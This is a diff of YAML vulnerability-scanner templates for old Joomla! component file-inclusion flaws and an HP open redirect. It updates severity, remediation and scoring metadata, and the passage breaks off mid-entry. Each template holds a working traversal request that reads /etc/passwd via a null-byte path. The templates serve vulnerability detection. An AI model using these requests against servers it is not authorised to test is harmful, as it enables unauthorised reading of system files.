4a0a0047304502200b21106e9029d4da86bd348fd6cefda13514098393858fd82bb09463a3eb3847022100a6fc141de252da8d324693ba1e2ae4a1652fbfd93128c18cfb8f09cab9ccf6cf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index aa4f6783bd..bbfcaf37d2 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -3,33 +3,40 @@ id: CVE-2010-1532 info: name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12118 - https://nvd.nist.gov/vuln/detail/CVE-2010-1532 - http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt - - http://web.archive.org/web/20210127202836/https://www.securityfocus.com/bid/39348/ - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1532 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00477 + epss-percentile: 0.7305 + cpe: cpe:2.3:a:givesight:com_powermail:1.53:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: givesight + product: com_powermail + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/15 + +# digest: 4a0a00473045022073f1f8cfd138222ec9a957029fe654b6fda25f23843b3f18ec0cc37942425b8d022100f146719b8e675bb62598d45326c1eba3d879b27b3f7d6b4e38acea0c0435f178:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index 00de42c7d4..e8315a0fee 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -5,31 +5,38 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12142 - https://nvd.nist.gov/vuln/detail/CVE-2010-1533 - - http://web.archive.org/web/20140723212810/http://secunia.com/advisories/39258/ - http://www.exploit-db.com/exploits/12142 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-1533 cwe-id: CWE-22 - cvss-score: 7.5 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.00706 + epss-percentile: 0.78205 + cpe: cpe:2.3:a:peter_hocherl:com_tweetla:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: peter_hocherl + product: com_tweetla + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/15 + +# digest: 490a0046304402201c3c70a243b4b6f0546c06ea1b287327ca1e4dafbddecacf120e7baf65a616800220069b91056ef859e40105667296c092ffcd1ea89e7118e0de6bfc0ffa33de0020:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index 462028c6a7..716943b0e4 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -3,33 +3,41 @@ id: CVE-2010-1534 info: name: Joomla! Component Shoutbox Pro - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version reference: - https://www.exploit-db.com/exploits/12067 - https://nvd.nist.gov/vuln/detail/CVE-2010-1534 - - http://web.archive.org/web/20210121195246/https://www.securityfocus.com/bid/39213/ - - http://web.archive.org/web/20140724182459/http://secunia.com/advisories/39352/ - remediation: Upgrade to a supported version + - http://www.exploit-db.com/exploits/12067 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57534 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1534 cwe-id: CWE-22 - tags: joomla,lfi,edb,cve,cve2010 + epss-score: 0.01733 + epss-percentile: 0.86477 + cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla.batjo + product: com_shoutbox + tags: joomla,lfi,edb,cve,cve2010 http: - method: GET path: - "{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/15 + +# digest: 4a0a00473045022100a5048b34d3f92a4653313eceb83555c5794b55c5e1f5988bce9e12b02058ad5502203fd0ceae1419225f4018c52dcf065a3bfe05c59afe4abc52336cda0673bc9de3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 60a2398d6c..d830336319 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -5,31 +5,39 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update to the latest version of Joomla! Component TRAVELbook or apply the necessary patches to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12151 - https://nvd.nist.gov/vuln/detail/CVE-2010-1535 - - http://web.archive.org/web/20140725030342/http://secunia.com/advisories/39254/ - http://www.exploit-db.com/exploits/12151 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-1535 cwe-id: CWE-22 - cvss-score: 7.5 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.00706 + epss-percentile: 0.78205 + cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: peter_hocherl + product: com_travelbook + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/03/24 +# digest: 4a0a00473045022100e416e882c8858cb4842431d331d1454f7756c6f88d821b7555fd8e317f1678ec0220120b53bf3c8bd0789ae35ed115c433c2d22084c38c62b27d8afee0dd11f2f26f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index 116d7727d5..03ba1e6321 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -3,33 +3,40 @@ id: CVE-2010-1540 info: name: Joomla! Component com_blog - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. + remediation: | + Apply the latest security patches or updates provided by Joomla! to fix the directory traversal vulnerability in com_blog component. reference: - https://www.exploit-db.com/exploits/11625 - https://nvd.nist.gov/vuln/detail/CVE-2010-1540 - - http://web.archive.org/web/20140721042709/http://secunia.com/advisories/38777/ - - http://web.archive.org/web/20210121194559/https://www.securityfocus.com/bid/38530/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1540 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.0045 + epss-percentile: 0.72278 + cpe: cpe:2.3:a:myblog:com_myblog:3.0.329:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: myblog + product: com_myblog + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/03/06 +# digest: 4a0a00473045022100c10ec1082a45397da1a58c7644d1cdc47de8862f16932a58f856e3f272e7578d0220651958178f10333f8b4955a05d885e3a9944f233ae2b51dd8633db9a704d5552:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml index be1672ce8f..4763a99d82 100644 --- a/http/cves/2010/CVE-2010-1586.yaml +++ b/http/cves/2010/CVE-2010-1586.yaml @@ -6,17 +6,24 @@ info: severity: medium description: | Open redirect vulnerability in red2301.html in HP System Management Homepage (SMH) 2.x.x.x allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the RedirectUrl parameter. + remediation: | + Apply the latest patches or updates provided by HP to fix the open redirect vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1586 - https://yehg.net/lab/pr0js/advisories/hp_system_management_homepage_url_redirection_abuse + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58107 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2010-1586 cwe-id: CWE-20 + epss-score: 0.00917 + epss-percentile: 0.81122 cpe: cpe:2.3:a:hp:system_management_homepage:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: hp + product: system_management_homepage tags: cve,cve2010,redirect,smh,hp http: @@ -29,3 +36,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + +# digest: 490a0046304402207fda4f63cf498f1da6e7e4085cb66fa1bba9d344d1a415768a78fafc87bb35b6022020cfdc90d513953776229ff7e434a2c875e7e9522cf7710ce6689575843ca651:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index 5acc60f5f5..9e27543a8b 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -3,33 +3,42 @@ id: CVE-2010-1601 info: name: Joomla! Component JA Comment - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + remediation: | + Apply the latest security patches or upgrade to a patched version of Joomla! Component JA Comment to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12236 - https://nvd.nist.gov/vuln/detail/CVE-2010-1601 - - http://web.archive.org/web/20140803084823/http://secunia.com/advisories/39472/ - http://packetstormsecurity.org/1004-exploits/joomlajacomment-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57848 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1601 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.01299 + epss-percentile: 0.84384 + cpe: cpe:2.3:a:joomlamart:com_jacomment:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlamart + product: com_jacomment + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/03/24 +# digest: 4a0a00473045022100e414cd0ef4e79e98f2f24795401c2ef50b62672b0527c49faab21318c65e8584022059cf083687b0ed430293cdced98bceae477228f2e708bc23d9e7b3c2801088fb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 124304f307..a8d4528081 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -5,30 +5,40 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update to the latest version of Joomla! Component ZiMB Comment or apply the provided patch to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12283 - https://nvd.nist.gov/vuln/detail/CVE-2010-1602 - http://packetstormsecurity.org/1004-exploits/joomlazimbcomment-lfi.txt + - http://www.vupen.com/english/advisories/2010/0932 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1602 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.03451 + epss-percentile: 0.90421 + cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zimbllc + product: com_zimbcomment + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/03/30 +# digest: 4b0a00483046022100affbe9de14bea86ced242c409bf1be399d3f664c582a4fbb611927a3c0f8c74f022100da55a2693d3a640cc5158294545532bf299edb394ee7cd6f3f5cd14ab75ee26e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index d4bdc9f4bc..bf13b9a7a7 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -5,32 +5,38 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12284 - https://nvd.nist.gov/vuln/detail/CVE-2010-1603 - - http://web.archive.org/web/20210518112730/https://www.securityfocus.com/bid/39546 - http://www.vupen.com/english/advisories/2010/0931 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1603 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.03451 + epss-percentile: 0.90421 + cpe: cpe:2.3:a:zimbllc:com_zimbcore:0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zimbllc + product: com_zimbcore + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/15 +# digest: 4a0a004730450220203923d9d5f13905040aa4b25576ff325b2ee041973896d26beeab3a89705f3e02210092186baf0e4dd1e760fc0658227d749d5d03bd930c28e73b586698fe5b915f2a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index c8c8962cad..de47ff23e5 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -3,33 +3,41 @@ id: CVE-2010-1607 info: name: Joomla! Component WMI 1.5.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update Joomla! Component WMI to the latest version or apply the provided patch to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12316 - https://nvd.nist.gov/vuln/detail/CVE-2010-1607 - - http://web.archive.org/web/20210121195713/https://www.securityfocus.com/bid/39608/ - - http://web.archive.org/web/20111227231442/http://secunia.com/advisories/39539/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58032 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1607 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01726 + epss-percentile: 0.86454 + cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: paysyspro + product: com_wmi + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/03/07 +# digest: 4b0a00483046022100f1d7941da86af37675cb4c2c78add8f9b95897835667c28876e4f724f2474957022100ae45e62512178efde3ad48510835d446ce0623c2f02ff05a641739a136935321:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 5f0b80c144..897d571d79 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -5,31 +5,40 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update Joomla! Component Graphics to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12430 - https://nvd.nist.gov/vuln/detail/CVE-2010-1653 - http://packetstormsecurity.org/1004-exploits/joomlagraphics-lfi.txt - - http://web.archive.org/web/20210121195909/https://www.securityfocus.com/bid/39743/ + - http://www.vupen.com/english/advisories/2010/1004 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1653 cwe-id: CWE-22 - tags: edb,packetstorm,cve,cve2010,joomla,lfi + epss-score: 0.03527 + epss-percentile: 0.9051 + cpe: cpe:2.3:a:htmlcoderhelper:com_graphics:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: htmlcoderhelper + product: com_graphics + tags: edb,packetstorm,cve,cve2010,joomla,lfi http: - method: GET path: - "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/03/23 +# digest: 4a0a0047304502200ed5fb87e2a33bf5ea87fde857f5e0d0af572666c3e001344fee08fb02657430022100abe5837a592a392b24608de4e555963137fdb3b5c6d85f504d6886ca61854402:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index 242e6be9b0..1492bcd192 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -3,33 +3,42 @@ id: CVE-2010-1657 info: name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update to the latest version of Joomla! Component SmartSite or apply the necessary patches to fix the LFI vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-1657 - https://www.exploit-db.com/exploits/12428 - http://www.vupen.com/english/advisories/2010/1006 - - http://web.archive.org/web/20210121195906/https://www.securityfocus.com/bid/39740/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58175 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1657 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01751 + epss-percentile: 0.86565 + cpe: cpe:2.3:a:recly:com_smartsite:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: recly + product: com_smartsite + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/27 +# digest: 4b0a0048304602210094a10554d8aadc5103d28e0cc09cffd0ef6ee233b7a2261ab74d118f22bc50c5022100b7e37e77db708e84fd958e5b4235fd8e61dcda00a5aa540935aa479750c4976d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index 98d74e6505..ecf765d14f 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml @@ -3,32 +3,42 @@ id: CVE-2010-1658 info: name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update to the latest version of Joomla! Component NoticeBoard or apply the necessary patches to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12427 - https://nvd.nist.gov/vuln/detail/CVE-2010-1658 - http://www.vupen.com/english/advisories/2010/1007 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58176 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1658 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01751 + epss-percentile: 0.86565 + cpe: cpe:2.3:a:code-garage:com_noticeboard:1.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: code-garage + product: com_noticeboard + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/27 +# digest: 4a0a004730450220230267e81d0271dcd214e715ad2ff5ba6deabc2ff8d0a4370448175a26af7cc80221008190c0d2abf72e59a50950852d7267d64fa264c2bf0377a591e24b7243e9cf20:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index affe396cd3..156030b769 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -3,33 +3,43 @@ id: CVE-2010-1659 info: name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Apply the latest security patches or updates provided by the Joomla! project to fix the LFI vulnerability in Ultimate Portfolio 1.0 component. reference: - https://www.exploit-db.com/exploits/12426 - https://nvd.nist.gov/vuln/detail/CVE-2010-1659 - - http://web.archive.org/web/20210121195906/https://www.securityfocus.com/bid/39739/ - http://www.exploit-db.com/exploits/12426 + - http://www.vupen.com/english/advisories/2010/1008 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58177 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1659 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.01806 + epss-percentile: 0.86808 + cpe: cpe:2.3:a:webkul:com_ultimateportfolio:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: webkul + product: com_ultimateportfolio + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/28 +# digest: 4a0a00473045022028fccd450c42345475fa406646ddef49f4eaf7fcb923ef24f9c15d77d861ab9b022100b614d1b26accdb76324b35754f03b70b0192b821b692e6c37d9485ee840dfbfa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml index 573e95c4a9..346a6f8a6e 100644 --- a/http/cves/2010/CVE-2010-1714.yaml +++ b/http/cves/2010/CVE-2010-1714.yaml @@ -3,33 +3,43 @@ id: CVE-2010-1714 info: name: Joomla! Component Arcade Games 1.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Apply the latest security patches or updates provided by the Joomla! project to fix the LFI vulnerability in the Arcade Games component. reference: - https://www.exploit-db.com/exploits/12168 - https://nvd.nist.gov/vuln/detail/CVE-2010-1714 - http://packetstormsecurity.org/1004-exploits/joomlaarcadegames-lfi.txt - - http://web.archive.org/web/20140723192327/http://secunia.com/advisories/39413/ + - http://www.vupen.com/english/advisories/2010/0860 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57683 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1714 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.01751 + epss-percentile: 0.86565 + cpe: cpe:2.3:a:dev.pucit.edu.pk:com_arcadegames:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dev.pucit.edu.pk + product: com_arcadegames + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/28 +# digest: 490a00463044022079ae61826374812d0c51c30735f00eced9357c00c01f8c762394aa327247c7cd0220086eb47f6aaa1cd053efcbbe616e6e90405af19071a06ec3d6a1e64e4a0e0f43:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index 25f8fba46e..c6d1d448e7 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -3,32 +3,42 @@ id: CVE-2010-1715 info: name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update to the latest version of Joomla! Component Online Exam and apply any available patches or security updates. reference: - https://www.exploit-db.com/exploits/12174 - https://nvd.nist.gov/vuln/detail/CVE-2010-1715 - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57677 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1715 cwe-id: CWE-22 - tags: joomla,lfi,edb,packetstorm,cve,cve2010 + epss-score: 0.01242 + epss-percentile: 0.83974 + cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: pucit.edu + product: com_onlineexam + tags: joomla,lfi,edb,packetstorm,cve,cve2010 http: - method: GET path: - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/03/10 +# digest: 4a0a0047304502201a69f2f0f9dfc961a5d4026d1db14b569ea0b7f347db26f30c4e535747c87177022100a8bb1d92c3535d297bd314ff34a02e5efb456566b747164129c20955a96c4aac:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index aa83eb41da..635ab16bcc 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ 